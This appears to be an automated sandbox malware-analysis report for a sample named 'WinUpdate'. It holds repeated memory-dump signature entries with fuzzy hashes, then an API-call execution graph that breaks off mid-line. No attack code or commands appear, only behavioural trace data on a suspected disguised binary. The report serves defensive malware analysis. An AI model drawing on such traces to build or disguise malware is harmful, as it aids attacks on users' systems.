                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: string too long
                                                                                                                                                                                                                                                                                                • API String ID: 0-2556327735
                                                                                                                                                                                                                                                                                                • Opcode ID: 25fba71cc95f781cd9963768d063412e9d4f9aac76987ea5514fa5efdf1f4ec8
                                                                                                                                                                                                                                                                                                • Instruction ID: 15c224a21538f9790836f5c726a40e0df5128f8623dfe489635fbbf3d33d23f8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25fba71cc95f781cd9963768d063412e9d4f9aac76987ea5514fa5efdf1f4ec8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C31C6323047119BF726CE5CAC8096BF3EDEB956D1760CA2EE58187759CB32DC4087A1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: string too long
                                                                                                                                                                                                                                                                                                • API String ID: 0-2556327735
                                                                                                                                                                                                                                                                                                • Opcode ID: 70dbc66239ad932e5ad2578cf957121af7253a2e763b2f5b83b09a84689d1bac
                                                                                                                                                                                                                                                                                                • Instruction ID: 1ea6db056af32ae78525d840582dd1771f02cb9085f46fc2c6811f606c33abc7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70dbc66239ad932e5ad2578cf957121af7253a2e763b2f5b83b09a84689d1bac
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F31D5B27057108BA734DE5CE88085EF3E9FF81691322562EF186C7618DF31AA4487A5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 10003FDB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                • Opcode ID: b9ae4267b34400fa55d51dc4f8be9ceed40e1449c4501b0f5fd7de9ec1f04af8
                                                                                                                                                                                                                                                                                                • Instruction ID: 67010eaabe5ec19f8eb2dbbdff826c503681b6fb1e0afb3ed4744b86d6ac49c7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9ae4267b34400fa55d51dc4f8be9ceed40e1449c4501b0f5fd7de9ec1f04af8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F631D2367043128BE721CE5CE840B67F7F9EB916A1F214A3FF5468B649D772A84087A1
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A,?), ref: 1000AE36
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                                                • String ID: $MZ@
                                                                                                                                                                                                                                                                                                • API String ID: 2325560087-1719208621
                                                                                                                                                                                                                                                                                                • Opcode ID: 391da35a3863b86254b03c17b4306fa7bf071c5b162a5709827f420cadfd38cb
                                                                                                                                                                                                                                                                                                • Instruction ID: c10e40035c381da4b7154146db833fe46c232d81a9f0e8cf3361085bbbd73af4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 391da35a3863b86254b03c17b4306fa7bf071c5b162a5709827f420cadfd38cb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5516AB1D10A568BEB44CFA5C8C16AEBBF4FB48394F20C16AD409EB254D334A981CF60
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 10003B85
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                • Opcode ID: e80fc9e7acba93add0a864e2ea6d913136b8c73cf80dd9242073d50fb3e317ae
                                                                                                                                                                                                                                                                                                • Instruction ID: edc99c1af25dbac56c4533e702380cee898722e9e6e8df2b93293301c0b2d031
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e80fc9e7acba93add0a864e2ea6d913136b8c73cf80dd9242073d50fb3e317ae
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F631CF32304710CB9721DF6CE88085BF3E9FF85695311862FE686C7219EB31A95487A2
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1000818D
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 10008197
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                • String ID: vector<T> too long
                                                                                                                                                                                                                                                                                                • API String ID: 909987262-3788999226
                                                                                                                                                                                                                                                                                                • Opcode ID: cb9423fad82669d08df49fd2dc675643d09d7b70617caed834aba26ae0979558
                                                                                                                                                                                                                                                                                                • Instruction ID: 1ccc3903a69bb7a6bcf247a0b5372026bbc2c80ecff82e53e65115d2b39116d6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb9423fad82669d08df49fd2dc675643d09d7b70617caed834aba26ae0979558
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A231C2353006065FDB2CCE79DDD445AB7E6FF842A03288A3DE587C7688D671F9418740
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 10008357
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 10008361
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                • String ID: string too long
                                                                                                                                                                                                                                                                                                • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                                                                                • Opcode ID: d1227933316caae7ae65396413c237c6ac1f7300808140ee21e47fe7c18da551
                                                                                                                                                                                                                                                                                                • Instruction ID: 06a7295eeecc402cdca664894173e78d0fc65afa29d549bafe75b51b0943c357
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1227933316caae7ae65396413c237c6ac1f7300808140ee21e47fe7c18da551
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD213C353047508BE731DE5CA440A5AFBE8FBD1A90B600A6FE5D2C7746C772AB05C7A1
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1000A2BF
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1000A2D1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                • String ID: string too long
                                                                                                                                                                                                                                                                                                • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                                                                                • Opcode ID: 6dd525ef8d7e77387af9de298a25bce4af4d3effd1b65662e93e4d60fb48b7d7
                                                                                                                                                                                                                                                                                                • Instruction ID: b01bb7ab5e5c576250ddf7c738205e91cfded369ea80ce7225221d4f8e50cbfb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6dd525ef8d7e77387af9de298a25bce4af4d3effd1b65662e93e4d60fb48b7d7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6321BF34608781DFE721CF1CC880B4ABBF4FB46690F604B5EF49687645C772AA8487A2
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                                                                                                                                                • String ID: : $Se.
                                                                                                                                                                                                                                                                                                • API String ID: 4218353326-4089948878
                                                                                                                                                                                                                                                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                                                                                                                • Instruction ID: bd28c4b5cdd7c5c45e7a659d85ff1f15ca39b7e03526be76ab9349526a8c96fc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30112BB19402486ECB11DFA8D844BEDFBFD9F1A344F109056E545E7252E6705602CB64
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02E62903
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E635D2: RaiseException.KERNEL32(?,?,?,02E62925,00000000,00000000,00000000,?,?,?,?,?,02E62925,?,02E721B8), ref: 02E63632
                                                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02E62920
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                                • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                                • Opcode ID: 38419ff391ea8f60e2ad683ae49dcff1b1d2b51abc793a30f883d143aa449b88
                                                                                                                                                                                                                                                                                                • Instruction ID: d035a501701e3218a8dc06cc9d29d7e3db648288d9c871f2af32d70b95ee219b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38419ff391ea8f60e2ad683ae49dcff1b1d2b51abc793a30f883d143aa449b88
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DF0F434AC020CB38B00B6A4EC0C9B9776D9B007D4B50E170BF2996490EB71E915C9D0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 1000A5D2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1000A547: std::exception::exception.LIBCONCRT ref: 1000A554
                                                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 1000A5E0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1000C804: RaiseException.KERNEL32(?,?,1000A5C5,?,?,?,?,?,?,?,?,1000A5C5,?,10029888,?), ref: 1000C863
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                                                • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                • API String ID: 1586462112-410509341
                                                                                                                                                                                                                                                                                                • Opcode ID: 8dd5df01de20f634a69ec2260896378e75b1805372777f46904e0a70281a341b
                                                                                                                                                                                                                                                                                                • Instruction ID: 0adb93ce51021025e8d7fce423e68b35576232a694bedcd472ba45c4d6c42089
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8dd5df01de20f634a69ec2260896378e75b1805372777f46904e0a70281a341b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0D0A73C90010C77DB04DAA4DC41D9C776CFF05184FD08060B654C2145EB31EA998781

                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                Execution Coverage:6.2%
                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:77
                                                                                                                                                                                                                                                                                                execution_graph 40327 441819 40330 430737 40327->40330 40329 441825 40331 430756 40330->40331 40343 43076d 40330->40343 40332 430774 40331->40332 40333 43075f 40331->40333 40345 43034a memcpy 40332->40345 40344 4169a7 11 API calls 40333->40344 40336 4307ce 40337 430819 memset 40336->40337 40346 415b2c 11 API calls 40336->40346 40337->40343 40338 43077e 40338->40336 40341 4307fa 40338->40341 40338->40343 40340 4307e9 40340->40337 40340->40343 40347 4169a7 11 API calls 40341->40347 40343->40329 40344->40343 40345->40338 40346->40340 40347->40343 37670 442ec6 19 API calls 37844 4152c6 malloc 37845 4152e2 37844->37845 37846 4152ef 37844->37846 37848 416760 11 API calls 37846->37848 37848->37845 37849 4466f4 37868 446904 37849->37868 37851 446700 GetModuleHandleA 37854 446710 __set_app_type __p__fmode __p__commode 37851->37854 37853 4467a4 37855 4467ac __setusermatherr 37853->37855 37856 4467b8 37853->37856 37854->37853 37855->37856 37869 4468f0 _controlfp 37856->37869 37858 4467bd _initterm __wgetmainargs _initterm 37860 44681e GetStartupInfoW 37858->37860 37861 446810 37858->37861 37862 446866 GetModuleHandleA 37860->37862 37870 41276d 37862->37870 37866 446896 exit 37867 44689d _cexit 37866->37867 37867->37861 37868->37851 37869->37858 37871 41277d 37870->37871 37913 4044a4 LoadLibraryW 37871->37913 37873 412785 37904 412789 37873->37904 37921 414b81 37873->37921 37876 4127c8 37927 412465 memset ??2@YAPAXI 37876->37927 37878 4127ea 37939 40ac21 37878->37939 37883 412813 37957 40dd07 memset 37883->37957 37884 412827 37962 40db69 memset 37884->37962 37888 412822 37983 4125b6 ??3@YAXPAX 37888->37983 37889 40ada2 _wcsicmp 37890 41283d 37889->37890 37890->37888 37893 412863 CoInitialize 37890->37893 37967 41268e 37890->37967 37987 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37893->37987 37897 41296f 37989 40b633 37897->37989 37899 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37905 412957 CoUninitialize 37899->37905 37910 4128ca 37899->37910 37904->37866 37904->37867 37905->37888 37906 4128d0 TranslateAcceleratorW 37907 412941 GetMessageW 37906->37907 37906->37910 37907->37905 37907->37906 37908 412909 IsDialogMessageW 37908->37907 37908->37910 37909 4128fd IsDialogMessageW 37909->37907 37909->37908 37910->37906 37910->37908 37910->37909 37911 41292b TranslateMessage DispatchMessageW 37910->37911 37912 41291f IsDialogMessageW 37910->37912 37911->37907 37912->37907 37912->37911 37914 4044cf GetProcAddress 37913->37914 37917 4044f7 37913->37917 37915 4044e8 FreeLibrary 37914->37915 37918 4044df 37914->37918 37916 4044f3 37915->37916 37915->37917 37916->37917 37919 404507 MessageBoxW 37917->37919 37920 40451e 37917->37920 37918->37915 37919->37873 37920->37873 37922 414b8a 37921->37922 37923 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37921->37923 37993 40a804 memset 37922->37993 37923->37876 37926 414b9e GetProcAddress 37926->37923 37928 4124e0 37927->37928 37929 412505 ??2@YAPAXI 37928->37929 37930 41251c 37929->37930 37932 412521 37929->37932 38015 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37930->38015 38004 444722 37932->38004 37938 41259b wcscpy 37938->37878 38020 40b1ab free free 37939->38020 37943 40a9ce malloc memcpy free free 37950 40ac5c 37943->37950 37944 40ad4b 37952 40ad76 37944->37952 38044 40a9ce 37944->38044 37946 40ace7 free 37946->37950 37950->37943 37950->37944 37950->37946 37950->37952 38024 40a8d0 37950->38024 38036 4099f4 37950->38036 37951 40a8d0 7 API calls 37951->37952 38021 40aa04 37952->38021 37953 40ada2 37954 40adc9 37953->37954 37955 40adaa 37953->37955 37954->37883 37954->37884 37955->37954 37956 40adb3 _wcsicmp 37955->37956 37956->37954 37956->37955 38049 40dce0 37957->38049 37959 40dd3a GetModuleHandleW 38054 40dba7 37959->38054 37963 40dce0 3 API calls 37962->37963 37964 40db99 37963->37964 38126 40dae1 37964->38126 38140 402f3a 37967->38140 37969 412766 37969->37888 37969->37893 37970 4126d3 _wcsicmp 37971 4126a8 37970->37971 37971->37969 37971->37970 37973 41270a 37971->37973 38174 4125f8 7 API calls 37971->38174 37973->37969 38143 411ac5 37973->38143 37984 4125da 37983->37984 37985 4125f0 37984->37985 37986 4125e6 DeleteObject 37984->37986 37988 40b1ab free free 37985->37988 37986->37985 37987->37899 37988->37897 37990 40b640 37989->37990 37991 40b639 free 37989->37991 37992 40b1ab free free 37990->37992 37991->37990 37992->37904 37994 40a83b GetSystemDirectoryW 37993->37994 37995 40a84c wcscpy 37993->37995 37994->37995 38000 409719 wcslen 37995->38000 37998 40a881 LoadLibraryW 37999 40a886 37998->37999 37999->37923 37999->37926 38001 409724 38000->38001 38002 409739 wcscat LoadLibraryW 38000->38002 38001->38002 38003 40972c wcscat 38001->38003 38002->37998 38002->37999 38003->38002 38005 444732 38004->38005 38006 444728 DeleteObject 38004->38006 38016 409cc3 38005->38016 38006->38005 38008 412551 38009 4010f9 38008->38009 38010 401130 38009->38010 38011 401134 GetModuleHandleW LoadIconW 38010->38011 38012 401107 wcsncat 38010->38012 38013 40a7be 38011->38013 38012->38010 38014 40a7d2 38013->38014 38014->37938 38014->38014 38015->37932 38019 409bfd memset wcscpy 38016->38019 38018 409cdb CreateFontIndirectW 38018->38008 38019->38018 38020->37950 38022 40aa14 38021->38022 38023 40aa0a free 38021->38023 38022->37953 38023->38022 38025 40a8eb 38024->38025 38026 40a8df wcslen 38024->38026 38027 40a906 free 38025->38027 38028 40a90f 38025->38028 38026->38025 38029 40a919 38027->38029 38030 4099f4 3 API calls 38028->38030 38031 40a932 38029->38031 38032 40a929 free 38029->38032 38030->38029 38034 4099f4 3 API calls 38031->38034 38033 40a93e memcpy 38032->38033 38033->37950 38035 40a93d 38034->38035 38035->38033 38037 409a41 38036->38037 38038 4099fb malloc 38036->38038 38037->37950 38040 409a37 38038->38040 38041 409a1c 38038->38041 38040->37950 38042 409a30 free 38041->38042 38043 409a20 memcpy 38041->38043 38042->38040 38043->38042 38045 40a9e7 38044->38045 38046 40a9dc free 38044->38046 38048 4099f4 3 API calls 38045->38048 38047 40a9f2 38046->38047 38047->37951 38048->38047 38073 409bca GetModuleFileNameW 38049->38073 38051 40dce6 wcsrchr 38052 40dcf5 38051->38052 38053 40dcf9 wcscat 38051->38053 38052->38053 38053->37959 38074 44db70 38054->38074 38058 40dbfd 38077 4447d9 38058->38077 38061 40dc34 wcscpy wcscpy 38103 40d6f5 38061->38103 38062 40dc1f wcscpy 38062->38061 38065 